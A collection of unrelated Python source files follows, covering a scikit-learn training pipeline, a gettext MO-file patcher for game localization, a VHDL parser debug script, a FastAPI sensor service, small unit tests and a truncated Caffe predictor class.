helper function to normalize each numerical column
input:
df: pandas dataframe
output:
df: normalized pandas dataframe
"""
df[quant_columns] = StandardScaler().fit_transform(df[quant_columns])
return df
def encoder(df, cat_columns):
"""
helper function to one-hot-encode each categorical column
input:
df: pandas dataframe
output:
df: one-hot-encoded pandas dataframe
"""
return pd.get_dummies(df, columns=cat_columns, drop_first=True)
def perform_train_test_split(df, target, test_size, random_state):
"""
input:
df: pandas dataframe
output:
X_train: X training data
X_test: X testing data
y_train: y training data
y_test: y testing data
target: target column
"""
X = df.drop(columns=[target])
y = df[target].ravel()
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=test_size, random_state=random_state, stratify=y
)
return X_train, X_test, y_train, y_test
def classification_report_image(
y_train, y_test, y_train_preds, y_test_preds, output_path
):
"""
produces classification report for training and testing results
input:
y_train: training response values
y_test: test response values
y_train_preds: training predictions
y_test_preds: test predictions
output_path: path to store the figure
output:
None
"""
plt.rc("figure", figsize=(7, 5))
plt.text(
0.01, 1.1, str("Train"), {"fontsize": 10}, fontproperties="monospace"
)
plt.text(
0.01,
0.7,
str(classification_report(y_train, y_train_preds)),
{"fontsize": 10},
fontproperties="monospace",
)
plt.text(
0.01, 0.5, str("Test"), {"fontsize": 10}, fontproperties="monospace"
)
plt.text(
0.01,
0.1,
str(classification_report(y_test, y_test_preds)),
{"fontsize": 10},
fontproperties="monospace",
)
plt.axis("off")
plt.savefig(output_path + "classification_report.png")
plt.close()
def feature_importance_plot(model, X, output_path):
"""
creates and stores the feature importances in output_path
input:
model: model object containing feature_importances_
        X: pandas dataframe of X values
output_path: path to store the figure
output:
None
"""
importances = model.feature_importances_
indices = np.argsort(importances)[::-1]
names = [X.columns[i] for i in indices]
plt.figure(figsize=(20, 20))
plt.title("Feature Importance")
plt.ylabel("Importance")
plt.bar(range(X.shape[1]), importances[indices])
plt.xticks(range(X.shape[1]), names, rotation=60)
plt.savefig(output_path + "feature_importance.png")
plt.close()
def train_models(
X_train, X_test, y_train, y_test, image_output_path, model_output_path
):
"""
train, store model results: images + scores, and store models
input:
X_train: X training data
X_test: X testing data
y_train: y training data
y_test: y testing data
image_output_path: path to store the figures
model_output_path: path to store the models
    output:
        None (the best estimator is saved to model_output_path)
"""
rfc = RandomForestClassifier(random_state=42)
param_grid = {"n_estimators": [50, 100, 200], "max_depth": [2, 8, 16]}
cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)
cv_rfc.fit(X_train, y_train)
best_model = cv_rfc.best_estimator_
# creates and stores the feature importances
feature_importance_plot(best_model, X_test, image_output_path)
# produces classification report for training and testing results
y_train_preds = best_model.predict(X_train)
y_test_preds = best_model.predict(X_test)
classification_report_image(
y_train, y_test, y_train_preds, y_test_preds, image_output_path
)
# saves best model
joblib.dump(best_model, model_output_path)
if __name__ == "__main__":
logger.info("############################################################")
logger.info("import data")
df = import_data(constants.data_path)
logger.info(
f"inspect dataframe: \
\n{df.iloc[0]}"
)
logger.info(f"generate EDA report: {constants.eda_output_path}")
perform_eda(df, constants.eda_output_path)
logger.info(f"normalize numeric features: {constants.quant_columns}")
df = scaler(df, constants.quant_columns)
logger.info(
f"inspect dataframe: \
\n{df.iloc[0]}"
)
logger.info(f"one-hot-encode categorical features:{constants.cat_columns}")
df = encoder(df, constants.cat_columns)
logger.info(
f"inspect dataframe: \
\n{df.iloc[0]}"
)
logger.info(
f"perform train test split with the test size of {constants.test_size}"
)
X_train, X_test, y_train, y_test = perform_train_test_split(
df, constants.target, constants.test_size, constants.random_state
)
logger.info("start training")
train_models(
X_train,
X_test,
y_train,
y_test,
constants.image_output_path,
constants.model_output_path,
)
logger.info(
f"save models in {constants.model_output_path}, "
+ f"store results in {constants.image_output_path}"
)
|
StarcoderdataPython
|
32055
|
<reponame>kthy/wren
# -*- coding: utf-8 -*-
"""Gettext manipulation methods."""
from os import remove
from os.path import exists
from pathlib import Path
from shutil import copyfile, copystat
from typing import Sequence
from filehash import FileHash
from polib import MOFile, POFile, mofile
from wren.change import Change
def apply_changes(mo_file: MOFile, changelist: Sequence[Change]) -> None:
"""Apply all changes in the provided list of changes to the given MOFile."""
for change in changelist:
change.apply(mo_file)
def backup_original_mo(wowsdir: str, locale: str) -> None:
"""Copy the original `global.mo` to `global.mo.original`."""
global_mo_path = _global_mo_path(wowsdir, locale)
backup_mo_path = _backup_mo_path(wowsdir, locale)
_copyfile_and_checksum(global_mo_path, backup_mo_path)
def convert_mo_to_po(wowsdir: str, locale: str, outputdir: str) -> POFile:
"""Save the MO file for the given locale in PO format."""
mofile_path = Path(_global_mo_path(wowsdir, locale))
if not exists(mofile_path):
raise OSError(f"MO file for locale {locale} not found")
mof = mofile(mofile_path)
mof.save_as_pofile(f"{outputdir}/{mofile_path.stem}_{locale}.po")
def get_mo(wowsdir: str, locale: str) -> MOFile:
"""Open and return the global MO file in the given directory."""
return mofile(_global_mo_path(wowsdir, locale))
def restore_original_mo(wowsdir: str, locale: str) -> None:
"""Reinstate the original `global.mo` from `global.mo.original`."""
global_mo_path = _global_mo_path(wowsdir, locale)
backup_mo_path = _backup_mo_path(wowsdir, locale)
if exists(backup_mo_path):
_copyfile_and_checksum(backup_mo_path, global_mo_path)
remove(backup_mo_path)
def _copyfile_and_checksum(from_path, to_path) -> None:
"""Copy a file from from_path to to_path.
Raises OSError if the new file's checksum doesn't match the original."""
copyfile(from_path, to_path)
copystat(from_path, to_path)
hasher = FileHash("md5")
if hasher.hash_file(from_path) != hasher.hash_file(to_path):
raise OSError("Copy failed, hash mismatch detected")
def _backup_mo_path(wowsdir: str, locale: str) -> str:
return f"{_global_mo_path(wowsdir, locale)}.original"
def _global_mo_path(wowsdir: str, locale: str) -> str:
return f"{wowsdir}/res/texts/{locale}/LC_MESSAGES/global.mo"
|
StarcoderdataPython
|
4899831
|
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
# ==============================================================================
# Authors: <NAME>
#
# Python functions: A streaming VHDL parser
#
# Description:
# ------------------------------------
# TODO:
#
# License:
# ==============================================================================
# Copyright 2007-2017 <NAME> - Dresden, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
from pathlib import Path
import sys
import pyVHDLParser.Blocks.InterfaceObject
from pyVHDLParser.Base import ParserException
from pyVHDLParser.Token import StartOfDocumentToken, EndOfDocumentToken, CharacterToken, SpaceToken, StringToken, LinebreakToken, CommentToken, IndentationToken, Token
from pyVHDLParser.Token.Keywords import BoundaryToken, EndToken, KeywordToken, DelimiterToken, IdentifierToken
from pyVHDLParser.Blocks import CommentBlock, Block, StartOfDocumentBlock, EndOfDocumentBlock, MetaBlock
from pyVHDLParser.Blocks.Common import LinebreakBlock, IndentationBlock
from pyVHDLParser.Blocks.Structural import Entity
from pyVHDLParser.Blocks.List import GenericList, PortList
from pyVHDLParser.Functions import Console, Exit
Console.init()
for block in MetaBlock.BLOCKS:
try:
block.__cls_init__()
except AttributeError:
pass
rootDirectory = Path(".")
vhdlDirectory = rootDirectory / "vhdl"
if (len(sys.argv) == 2):
file = Path(sys.argv[1])
mode = 255
elif (len(sys.argv) == 3):
file = Path(sys.argv[1])
mode = int(sys.argv[2])
print("mode={0}".format(mode))
else:
print("File name expected.")
Exit.exit(-1)
if (not file.exists()):
	print("File '{0!s}' does not exist.".format(file))
	Exit.exit(-1)
with file.open('r') as fileHandle:
content = fileHandle.read()
# ==============================================================================
if (mode & 6 == 2):
from pyVHDLParser.Token.Parser import Tokenizer
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
try:
for vhdlToken in vhdlTokenStream:
if isinstance(vhdlToken, (LinebreakToken, SpaceToken, IndentationToken)):
print("{DARK_GRAY}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, CommentToken):
print("{DARK_GREEN}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, CharacterToken):
print("{DARK_CYAN}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, StringToken):
print("{WHITE}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, (StartOfDocumentToken, EndOfDocumentToken)):
print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
else:
print("{RED}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
if (mode & 1 == 1):
print("{RED}{line}{NOCOLOR}".format(line="=" * 160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
try:
tokenIterator = iter(vhdlTokenStream)
firstToken = next(tokenIterator)
if (not isinstance(firstToken, StartOfDocumentToken)):
print("{RED}First block is not StartOfDocumentToken: {token}{NOCOLOR}".format(token=firstToken, **Console.Foreground))
lastToken = None
vhdlToken = firstToken
for newToken in tokenIterator:
if (vhdlToken.NextToken is None):
print("{RED}Token has an open end.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Token: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
elif ((vhdlToken is not firstToken) and (lastToken.NextToken is not vhdlToken)):
print("{RED}Last token is not connected to the current token.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
print("{DARK_RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
if (lastToken.NextToken is None):
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token="--------", **Console.Foreground))
else:
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken.NextToken, **Console.Foreground))
if (vhdlToken.PreviousToken is None):
print("{DARK_RED} Prev: {token}{NOCOLOR}".format(token="--------", **Console.Foreground))
else:
print("{DARK_RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken.PreviousToken, **Console.Foreground))
elif (vhdlToken.PreviousToken is not lastToken):
print("{RED}Current token is not connected to lastToken.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
print("{RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
lastToken = vhdlToken
vhdlToken = newToken
if isinstance(newToken, EndOfDocumentToken):
break
else:
print("{RED}No EndOfDocumentToken found.{NOCOLOR}".format(**Console.Foreground))
if (not isinstance(vhdlToken, EndOfDocumentToken)):
print("{RED}Last token is not EndOfDocumentToken: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
elif (vhdlToken.PreviousToken is not lastToken):
print("{RED}EndOfDocumentToken is not connected to lastToken.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
print("{RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
if (mode & 6 == 4):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream, debug=(mode & 1 == 1))
try:
for vhdlBlock in vhdlBlockStream:
if isinstance(vhdlBlock, (LinebreakBlock, IndentationBlock)):
print("{DARK_GRAY}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, CommentBlock):
print("{DARK_GREEN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (Entity.NameBlock, Entity.NameBlock, Entity.EndBlock)):
print("{DARK_RED}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (GenericList.OpenBlock, GenericList.DelimiterBlock, GenericList.CloseBlock)):
print("{DARK_BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (PortList.OpenBlock, PortList.DelimiterBlock, PortList.CloseBlock)):
print("{DARK_CYAN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (pyVHDLParser.Blocks.InterfaceObject.InterfaceConstantBlock, pyVHDLParser.Blocks.InterfaceObject.InterfaceSignalBlock)):
print("{BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
else:
print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
if (mode & 6 == 6):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream, debug=(mode & 1 == 1))
try:
blockIterator = iter(vhdlBlockStream)
firstBlock = next(blockIterator)
if (not isinstance(firstBlock, StartOfDocumentBlock)):
print("{RED}First block is not StartOfDocumentBlock: {block}{NOCOLOR}".format(block=firstBlock, **Console.Foreground))
elif (not isinstance(firstBlock.StartToken, StartOfDocumentToken)):
print("{RED}First block is not StartOfDocumentToken: {token}{NOCOLOR}".format(token=firstBlock.StartToken, **Console.Foreground))
lastBlock : Block = firstBlock
endBlock : Block = None
lastToken : Token = firstBlock.StartToken
for vhdlBlock in blockIterator:
if isinstance(vhdlBlock, EndOfDocumentBlock):
endBlock = vhdlBlock
break
tokenIterator = iter(vhdlBlock)
relTokenPosition = 0
for token in tokenIterator:
relTokenPosition += 1
if (token.NextToken is None):
print("{RED}Token({pos}) has an open end.{NOCOLOR}".format(pos=relTokenPosition, **Console.Foreground))
print("{RED} Block: {block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
print("{RED} Token: {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif (lastToken.NextToken is not token):
print("{RED}Last token is not connected to the current ({pos}) one.{NOCOLOR}".format(pos=relTokenPosition, **Console.Foreground))
token11 = lastToken
token21 = lastToken.NextToken
token31 = "--------" if (lastToken.NextToken is None) else lastToken.NextToken.NextToken
token41 = "--------" if (lastToken.NextToken.NextToken is None) else lastToken.NextToken.NextToken.NextToken
token12 = "--------" if (token.PreviousToken.PreviousToken is None) else token.PreviousToken.PreviousToken.PreviousToken
token22 = "--------" if (token.PreviousToken is None) else token.PreviousToken.PreviousToken
token32 = token.PreviousToken
token42 = token
print("{RED} Block: {block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
print("{RED} | Last: {token1}{NOCOLOR} =?= {DARK_RED}Prev: {token2}{NOCOLOR}".format(token1=token11, token2=token12, **Console.Foreground))
print("{DARK_RED} | Next: {token1}{NOCOLOR} =?= {DARK_RED}Prev: {token2}{NOCOLOR}".format(token1=token21, token2=token22, **Console.Foreground))
print("{DARK_RED} | Next: {token1}{NOCOLOR} =?= {DARK_RED}Prev: {token2}{NOCOLOR}".format(token1=token31, token2=token32, **Console.Foreground))
print("{DARK_RED} v Next: {token1}{NOCOLOR} =?= {RED}Curr: {token2}{NOCOLOR}".format(token1=token41, token2=token42, **Console.Foreground))
elif (token.PreviousToken is not lastToken):
print("{RED}Current token is not connected to lastToken.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Block: {block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=token, **Console.Foreground))
print("{RED} Prev: {token}{NOCOLOR}".format(token=token.PreviousToken, **Console.Foreground))
lastToken = token
lastBlock = vhdlBlock
else:
print("{RED}No EndOfDocumentBlock found.{NOCOLOR}".format(**Console.Foreground))
if (not isinstance(endBlock, EndOfDocumentBlock)):
print("{RED}Last block is not EndOfDocumentBlock: {block}{NOCOLOR}".format(block=endBlock, **Console.Foreground))
elif (not isinstance(endBlock.StartToken, EndOfDocumentToken)):
print("{RED}Last token is not EndOfDocumentToken: {token}{NOCOLOR}".format(token=endBlock.StartToken, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream, debug=(mode & 1 == 1))
try:
for vhdlBlock in vhdlBlockStream:
print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
for token in vhdlBlock:
if isinstance(token, (IndentationToken, LinebreakToken, BoundaryToken, DelimiterToken, EndToken)):
print("{DARK_GRAY} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, (CommentToken)):
print("{DARK_GREEN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, KeywordToken):
print("{DARK_CYAN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, (StringToken, CharacterToken)):
print("{DARK_GREEN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, (IdentifierToken)):
print("{GREEN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
else:
print("{RED} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
if (mode & 8 == 8):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
from pyVHDLParser.Groups import BlockToGroupParser, StartOfDocumentGroup, EndOfDocumentGroup, Group
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
try:
vhdlTokenStream = [token for token in Tokenizer.GetVHDLTokenizer(content)]
vhdlBlockStream = [block for block in TokenToBlockParser.Transform(vhdlTokenStream)]
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
vhdlGroupStream = BlockToGroupParser.Transform(vhdlBlockStream, debug=(mode & 1 == 1))
try:
for vhdlGroup in vhdlGroupStream:
print("{CYAN}{block}{NOCOLOR}".format(block=vhdlGroup, **Console.Foreground))
for block in vhdlGroup:
if isinstance(block, (IndentationToken, LinebreakToken, BoundaryToken, DelimiterToken, EndToken)):
print("{DARK_GRAY} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
elif isinstance(block, (CommentToken)):
print("{DARK_GREEN} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
elif isinstance(block, KeywordToken):
print("{DARK_CYAN} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
elif isinstance(block, (StringToken, SpaceToken, CharacterToken)):
print("{DARK_GREEN} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
else:
print("{YELLOW} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
if (mode & 16 == 16):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
from pyVHDLParser.Groups import BlockToGroupParser, StartOfDocumentGroup, EndOfDocumentGroup, Group
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream)
vhdlGroupStream = BlockToGroupParser.Transform(vhdlBlockStream)
groups = [group for group in vhdlGroupStream]
firstGroup = groups[0]
lastGroup = groups[-1]
if (not isinstance(firstGroup, StartOfDocumentGroup)):
raise GroupParserException("Expected group is not a StartOfDocumentGroup.", firstGroup)
elif (not isinstance(lastGroup, EndOfDocumentGroup)):
raise GroupParserException("Expected group is not an EndOfDocumentGroup.", lastGroup)
# def _CategoryIterator(categories):
def validate(group : Group):
innerGroup = group.InnerGroup
while innerGroup is not None:
validate(innerGroup)
# if group registered?
if innerGroup.__class__ in group._subGroups:
if innerGroup not in group._subGroups[innerGroup.__class__]:
print("innerGroup '{0}' is not listed in _subGroups of '{1}'.".format(innerGroup, group))
else:
print("innerGroup '{0}' is not supported in group '{1}'".format(innerGroup, group))
innerGroup = innerGroup.NextGroup
validate(firstGroup)
# wordTokenStream = Tokenizer.GetWordTokenizer(content)
# vhdlBlockStream = TokenToBlockParser.Transform(wordTokenStream, debug=(mode & 1 == 1))
# strippedBlockStream = StripAndFuse(vhdlBlockStream)
#
# try:
# for vhdlBlock in strippedBlockStream:
# if isinstance(vhdlBlock, (LinebreakBlock, IndentationBlock)):
# print("{DARK_GRAY}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, CommentBlock):
# print("{DARK_GREEN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (Entity.NameBlock, Entity.ConcurrentBeginBlock, Entity.EndBlock)):
# print("{DARK_RED}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (GenericList.OpenBlock, GenericList.DelimiterBlock, GenericList.CloseBlock)):
# print("{DARK_BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (PortList.OpenBlock, PortList.DelimiterBlock, PortList.CloseBlock)):
# print("{DARK_CYAN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (GenericList.ItemBlock, PortList.ItemBlock)):
# print("{BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# else:
# print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
#
# except ParserException as ex:
# print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# except NotImplementedError as ex:
# print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
if (mode & 32 == 32):
from pyVHDLParser.DocumentModel import Document, GroupParserException, GroupParserException
try:
document = Document(file)
document.Parse()
document.Print(0)
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
|
StarcoderdataPython
|
11285824
|
from typing import List
from FridgeBot.PiCode.Tasks.Actions.IAction import IAction
from FridgeBot.PiCode.Tasks.Tasks.IFridgeTask import IFridgeTask
from FridgeBot.PiCode.Tasks.Filters.IIFilter import IFilter
class FridgeTask(IFridgeTask):
def __init__(self, filters: List[IFilter], action: IAction):
self._filters = filters
self._action = action
self._is_finished = False
def can_run(self) -> bool:
for single_filter in self._filters:
if not single_filter.filter():
return False
return True
def restart(self) -> None:
self._is_finished = False
for single_filter in self._filters:
single_filter.restart()
self._action.restart()
def is_finished(self) -> bool:
return self._is_finished
def run(self) -> None:
self._action.run()
self._is_finished = True
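# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# The stand-ins below only duck-type the calls FridgeTask makes on its
# collaborators (filter()/restart() on filters, run()/restart() on the action);
# the project's real IFilter/IAction implementations live elsewhere.
class _AlwaysPassFilter:
    def filter(self) -> bool:
        return True

    def restart(self) -> None:
        pass


class _PrintAction:
    def run(self) -> None:
        print("action executed")

    def restart(self) -> None:
        pass


if __name__ == "__main__":
    task = FridgeTask([_AlwaysPassFilter()], _PrintAction())
    if task.can_run():
        task.run()
    print(task.is_finished())  # True after run()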
|
StarcoderdataPython
|
5069913
|
from typing import *
from fastapi import FastAPI, Depends
from humtemp.configuration import settings
from humtemp.database import BucketRepository, connect
from humtemp.dto import Observation, Summary
connect(
host=settings.humtemp_redis_host,
port=settings.humtemp_redis_port,
db=settings.humtemp_redis_db
)
app = FastAPI()
async def _get_repository() -> BucketRepository:
return BucketRepository(
bucket_offset=settings.bucket_offset,
bucket_duration=settings.bucket_duration
)
@app.post('/observation')
async def observation(
data: Observation,
repo: BucketRepository = Depends(_get_repository)):
repo.add_observation(data)
@app.get('/summary', response_model=List[Summary])
async def summary(
offset: int = -1,
repo: BucketRepository = Depends(_get_repository)) -> List[Summary]:
result = []
for key in repo.find_in_bucket(offset=offset):
entity = repo.get(key)
if entity is None:
continue
result.append(Summary(
lab_id=entity.lab_id,
avg_temp=entity.avg_temp,
avg_humidity=entity.avg_humidity
))
return result
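# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# With a reachable Redis instance (per humtemp.configuration.settings) the API
# could be served and exercised roughly as below. The module path
# 'humtemp.api' and the observation payload fields are assumptions; check the
# actual Observation model in humtemp.dto before relying on them.
#
#   uvicorn humtemp.api:app --reload
#   curl -X POST localhost:8000/observation \
#        -H 'Content-Type: application/json' \
#        -d '{"lab_id": "lab-1", "temp": 21.5, "humidity": 40.2}'
#   curl 'localhost:8000/summary?offset=-1'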
|
StarcoderdataPython
|
4838386
|
import unittest
from walksignal.models import FreeSpaceModel
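# Note (added for clarity): the expected values in the assertions below are
# consistent with a free-space path-loss of the form
#     PL(dB) = 20*log10(d) + 20*log10(f) - 27.55
# e.g. 20*log10(1000) + 20*log10(1000000) - 27.55 = 60 + 120 - 27.55 = 152.45.
# How FreeSpaceModel itself interprets the units of d and f is an assumption;
# only the numeric constants are taken from the assertions themselves.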
class TestFreeSpaceModel(unittest.TestCase):
def test_min_input(self):
model = FreeSpaceModel(1)
pl = model.path_loss(1)
self.assertEqual(pl, -27.55)
def test_one_mhz_one_km(self):
model = FreeSpaceModel(1000000)
pl = model.path_loss(1000)
self.assertEqual(pl, 152.45)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
11280488
|
from pathlib import Path
import pytest
from day11.main import silver, OctopusesGrid, gold
INPUT_PATH = Path(__file__).parent / "input.txt"
EXAMPLE_PATH = Path(__file__).parent / "example.txt"
@pytest.mark.parametrize(
"before_desc,after_desc",
[
(
"""
11111
19991
19191
19991
11111
""",
"""
34543
40004
50005
40004
34543
"""
),
(
"""
6594254334
3856965822
6375667284
7252447257
7468496589
5278635756
3287952832
7993992245
5957959665
6394862637
""",
"""
8807476555
5089087054
8597889608
8485769600
8700908800
6600088989
6800005943
0000007456
9000000876
8700006848
"""
),
]
)
def test_step(before_desc: str, after_desc: str):
assert OctopusesGrid.parse(before_desc).step() == OctopusesGrid.parse(after_desc)
def test_flash_counts():
assert OctopusesGrid.parse(EXAMPLE_PATH.read_text()).multi_step(10).flashes == 204
def test_silver_example():
assert silver(EXAMPLE_PATH) == 1656
def test_silver_star():
assert silver(INPUT_PATH) == 1691
def test_gold_example():
assert gold(EXAMPLE_PATH) == 195
def test_gold_star():
assert gold(INPUT_PATH) == 216
|
StarcoderdataPython
|
1726835
|
<filename>visual_dynamics/predictors/predictor_caffe.py
import os
import re
import numpy as np
from collections import OrderedDict
import caffe
from caffe.proto import caffe_pb2 as pb2
from . import net_caffe
from . import predictor
class CaffeNetPredictor(caffe.Net):
"""
Predicts output given the current inputs
inputs -> prediction
"""
def __init__(self, model_file, pretrained_file=None, prediction_name=None):
if pretrained_file is None:
caffe.Net.__init__(self, model_file, caffe.TEST)
else:
caffe.Net.__init__(self, model_file, pretrained_file, caffe.TEST)
self.prediction_name = prediction_name or self.outputs[0]
self.prediction_dim = self.blob(self.prediction_name).shape[1]
def predict(self, *inputs, **kwargs):
batch = self.blob(self.inputs[0]).data.ndim == inputs[0].ndim
if batch:
